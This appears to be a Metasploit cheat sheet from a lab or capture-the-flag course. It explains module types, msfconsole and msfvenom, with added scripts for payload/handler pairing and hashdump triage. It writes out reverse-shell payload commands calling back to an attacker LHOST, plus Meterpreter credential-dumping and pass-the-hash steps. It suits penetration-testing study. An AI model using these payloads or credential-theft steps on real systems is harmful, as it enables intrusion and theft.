metasploit.md

File metadata and controls

116 lines (62 loc) · 4.16 KB

Metasploit

Modules

Auxiliary: Supporting modules that do not deliver a payload, such as scanners, crawlers and fuzzers.

Encoders: Encoders transform the exploit and payload bytes in the hope that a signature-based antivirus solution misses them. Encoding changes the representation of the payload, not its behaviour, and modern AV routinely decodes or emulates it.

Evasion: The modules that actually attempt to evade antivirus software. Encoders only encode the payload and should not be considered a direct attempt at evasion.

Exploits: Exploits, neatly organized by target system.

NOPs: NOPs (No OPeration) do nothing, literally. They are used as padding (a NOP sled) so that execution can land anywhere in the padding and slide into the payload, and to bring a payload up to a required size.

Payloads: Payloads are the code that runs on the target system once the exploit succeeds.

You will see three different directories under payloads: singles, stagers and stages.

  • Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
  • Stagers: Responsible for setting up a connection channel between Metasploit and the target system. A "staged payload" first delivers a small stager to the target; the stager then downloads the rest of the payload (the stage) over that channel. The advantage is that the initial payload is small compared to sending the full payload at once, which matters when the exploit only leaves room for a few hundred bytes.
  • Stages: Downloaded by the stager over the connection it set up. This allows much larger payloads (Meterpreter, VNC injection) than would fit in the exploit itself.

Metasploit has a subtle way to help you identify single (also called "inline") payloads and staged payloads.

  • generic/shell_reverse_tcp
  • windows/x64/shell/reverse_tcp

Both are reverse TCP shells. The former is an inline (or single) payload, as indicated by the "_" between "shell" and "reverse". The latter (a 64-bit Windows shell) is a staged payload, as indicated by the "/" between "shell" and "reverse". The same rule tells windows/meterpreter/reverse_tcp (staged) from windows/meterpreter_reverse_tcp (single), which matters because the handler must be set to exactly the payload that was generated.

Post: Post modules are used in the post-exploitation stage, once a session on the target exists (privilege escalation, credential gathering, pivoting, persistence).

Msfconsole

search <term> - search for modules (e.g. search type:exploit platform:windows smb); use <number> or use <path> to select one

show options - show the options of the selected module; mandatory ones are marked Required = yes

show payloads - list the payloads compatible with the selected module

set <option> <value> - set an option (e.g. set RHOSTS 10.10.10.5)

unset <option> - clear it; unset all clears every option

setg / unsetg - set or clear a value globally, for all modules (typically LHOST)

exploit / run - run the module; exploit -j runs it as a background job, exploit -z does not interact with the session once it opens

check - tests whether the target is vulnerable without exploiting it (not every module implements it)

sessions - list open sessions

sessions -i <id> - interact with a specific session

background - return from a session to the msf prompt, leaving the session open

Start database

systemctl start postgresql

msfdb init ### first run only; creates the msf database and user

msfconsole

msf6 > db_status ### should report "Connected to msf"; without the database, hosts, services and credentials are not saved

msf6 > workspace ### list workspaces; the active one is marked with *

msf6 > workspace -a pentest1 ### add (and switch to) a workspace, one per engagement

Msfvenom

msfvenom -l payloads ### show available payloads

msfvenom --list formats ### list supported output formats

encoders ### selected with the "-e" parameter; example -> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64 (msfvenom -l encoders lists them; encoding obfuscates the payload, it is not reliable AV evasion)

handler ### used to receive connections from the generated payload; it must be listening before the payload runs, and its PAYLOAD, LHOST and LPORT must match what msfvenom was given

use exploit/multi/handler

Different payloads:

  • Linux Executable and Linkable Format (elf)
    • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
    • The .elf format is the Linux counterpart of a Windows .exe. The file may still lack execute permission on the target: once rev_shell.elf is there, run chmod +x rev_shell.elf, then launch it with ./rev_shell.elf. Pick a payload whose architecture matches the target (linux/x64/... for a 64-bit host).
  • Windows
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
  • PHP
    • msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
    • This is the inline (single) PHP Meterpreter; the handler's PAYLOAD must be set to the same name.
  • ASP
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
  • Python
    • msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
    • cmd/* payloads produce a command line rather than a script, so inspect the output before deciding how to launch it on the target.
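The two mistakes that cost the most time with msfvenom are starting the handler with a different PAYLOAD than the one that was generated, and running a staged payload before the handler is listening. The script below is an added example, not part of these notes or of Metasploit itself: it validates LHOST/LPORT, classifies the payload as single or staged using the "_" versus "/" naming rule from the Modules section, writes a multi/handler resource script that reuses the exact PAYLOAD, LHOST and LPORT, and runs msfvenom only if it is installed. Function names, the 10.10.10.5 address and port 4444 are placeholders.

```shell
#!/bin/sh
# Added example (not from the original notes): pair an msfvenom payload with
# a multi/handler resource script that uses exactly the same PAYLOAD, LHOST
# and LPORT. Function names are hypothetical; 10.10.10.5 / 4444 are
# placeholder values.

# Classify a payload name as "single" (inline) or "staged" from its name:
# staged payloads put "/" between the stage (shell, meterpreter, ...) and the
# stager (reverse_tcp, bind_tcp, ...), singles join them with "_". This is a
# heuristic built on the naming convention; the authoritative answer is the
# word "Stager" or "Inline" in the description column of `msfvenom -l payloads`.
payload_kind() {
    name=$1
    last=${name##*/}           # e.g. reverse_tcp or shell_reverse_tcp
    rest=${name%/*}
    prev=${rest##*/}           # component before the last one
    case "$last" in
        reverse_*|bind_*)
            case "$prev" in
                meterpreter|shell|vncinject|dllinject|upexec|powershell|patchupmeterpreter|patchupdllinject)
                    echo staged
                    return 0 ;;
            esac ;;
    esac
    echo single
}

# LPORT must be an integer in 1..65535.
valid_lport() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# LHOST must be a dotted quad with each octet in 0..255 (IPv4 only; extend
# it if you need hostnames or IPv6).
valid_lhost() {
    addr=$1
    old_ifs=$IFS
    IFS=.
    set -- $addr
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case "$octet" in
            ''|*[!0-9]*) return 1 ;;
        esac
        [ "$octet" -le 255 ] || return 1
    done
}

# Emit a multi/handler resource script. ExitOnSession false keeps the handler
# job alive after the first session so several callbacks can be caught;
# exploit -j -z runs it as a background job without dropping into the session.
handler_rc() {
    payload=$1
    lhost=$2
    lport=$3
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j -z\n'
}

# build PAYLOAD LHOST LPORT FORMAT OUTFILE: validate inputs, write OUTFILE.rc
# for the handler and, when msfvenom is installed, generate OUTFILE with it.
build() {
    payload=$1
    lhost=$2
    lport=$3
    fmt=$4
    out=$5
    valid_lhost "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_lport "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    kind=$(payload_kind "$payload")
    echo "# $payload is a $kind payload"
    if [ "$kind" = staged ]; then
        echo "# start the handler first: a staged payload only receives its stage from a listening handler"
    fi
    handler_rc "$payload" "$lhost" "$lport" > "$out.rc"
    if command -v msfvenom >/dev/null 2>&1; then
        msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f "$fmt" -o "$out"
    else
        echo "msfvenom not installed; would run: msfvenom -p $payload LHOST=$lhost LPORT=$lport -f $fmt -o $out" >&2
    fi
    echo "# handler: msfconsole -q -r $out.rc"
}

# Usage: ./gen_and_listen.sh windows/x64/shell/reverse_tcp 10.10.10.5 4444 exe rev_shell.exe
if [ $# -eq 5 ]; then
    build "$@"
fi
```

Run the printed `msfconsole -q -r rev_shell.exe.rc` line before delivering the file; the resource script reproduces the setg/use/set/exploit -j sequence from the Msfconsole section, so a typo in LHOST or a mismatched PAYLOAD between the two tools cannot creep in.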

Meterpreter

meterpreter > getpid ### PID of the process Meterpreter is running in

meterpreter > ps ### list processes (pick a stable, high-privilege one to migrate into)

msfvenom --list payloads | grep meterpreter ### listing meterpreter payloads

meterpreter > help

meterpreter > hashdump ### dump the local SAM hashes; needs SYSTEM privileges, so run getsystem first (or migrate to a SYSTEM process such as lsass.exe, then hashdump). Migrating into lsass.exe is risky: if that process dies, the host reboots.

meterpreter > search -f flag2.txt ### search for a specific file

meterpreter > load kiwi ### loads the Mimikatz extension; creds_all and lsa_dump_sam are the usual next commands
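hashdump prints one line per local account in the form user:rid:lmhash:nthash:::, and the useful findings (accounts with an empty password, a stored LM hash, or the same NT hash as another account) are easy to miss by eye. The following is an added example, not part of these notes or of Metasploit: an awk-based triage over a constructed hashdump sample. The sample is made up for the example; the constants it uses are the well-known empty LM hash, the NT hash of an empty password and the NT hash of "password". Function and variable names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original notes): triage the output of the
# Meterpreter hashdump command. Function and variable names are hypothetical.

# Constructed sample in the user:rid:lmhash:nthash::: format that hashdump
# prints. Three constants are real and well known: aad3b435b51404eeaad3b435b51404ee
# is the "empty" LM hash (LM storage disabled), 31d6cfe0d16ae931b73c59d7e0c089c0 is
# the NT hash of an empty password and 8846f7eaee8fb117ad06bdd830b7586c is the NT
# hash of "password". The remaining hash value is made up.
HASHDUMP_SAMPLE='Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1002:aad3b435b51404eeaad3b435b51404ee:0f2c4e2a9b7d4c6e8a1b3d5f7e9c2a4b:::'

# Read hashdump lines on stdin and print one line per account with its NT
# hash and findings: EMPTY-PASSWORD (NT hash of ""), LM-HASH-PRESENT (an LM
# hash is stored, so the password is at most 14 characters and cheap to
# crack) and REUSED-WITH (same NT hash as an earlier account, i.e. a shared
# password). Lines that are not user:rid:lm:nt records (prompts, blanks) are skipped.
triage_hashdump() {
    awk -F: '
    BEGIN {
        empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0"
        empty_lm = "aad3b435b51404eeaad3b435b51404ee"
    }
    NF < 4 || $2 !~ /^[0-9]+$/ { next }
    {
        user = $1; rid = $2; lm = tolower($3); nt = tolower($4)
        flags = ""
        if (nt == empty_nt) flags = flags " EMPTY-PASSWORD"
        if (lm != empty_lm) flags = flags " LM-HASH-PRESENT"
        if (nt in seen) {
            flags = flags " REUSED-WITH:" seen[nt]
            seen[nt] = seen[nt] "," user
        } else {
            seen[nt] = user
        }
        printf "%-16s rid=%-5s nt=%s%s\n", user, rid, nt, flags
    }'
}

# Print user:nthash pairs usable for pass-the-hash, skipping accounts whose
# NT hash is that of an empty password (those are simply logged into with a
# blank password).
pth_candidates() {
    awk -F: 'NF >= 4 && $2 ~ /^[0-9]+$/ && tolower($4) != "31d6cfe0d16ae931b73c59d7e0c089c0" {
        print $1 ":" tolower($4)
    }'
}

# Usage: run the triage over the constructed sample (pipe a real dump in instead).
printf '%s\n' "$HASHDUMP_SAMPLE" | triage_hashdump
```

Paste the hashdump output into a file and run `triage_hashdump < hashes.txt`; the REUSED-WITH finding is the one to chase first, because a local administrator hash shared with a service account is exactly what pass-the-hash with psexec-style modules needs.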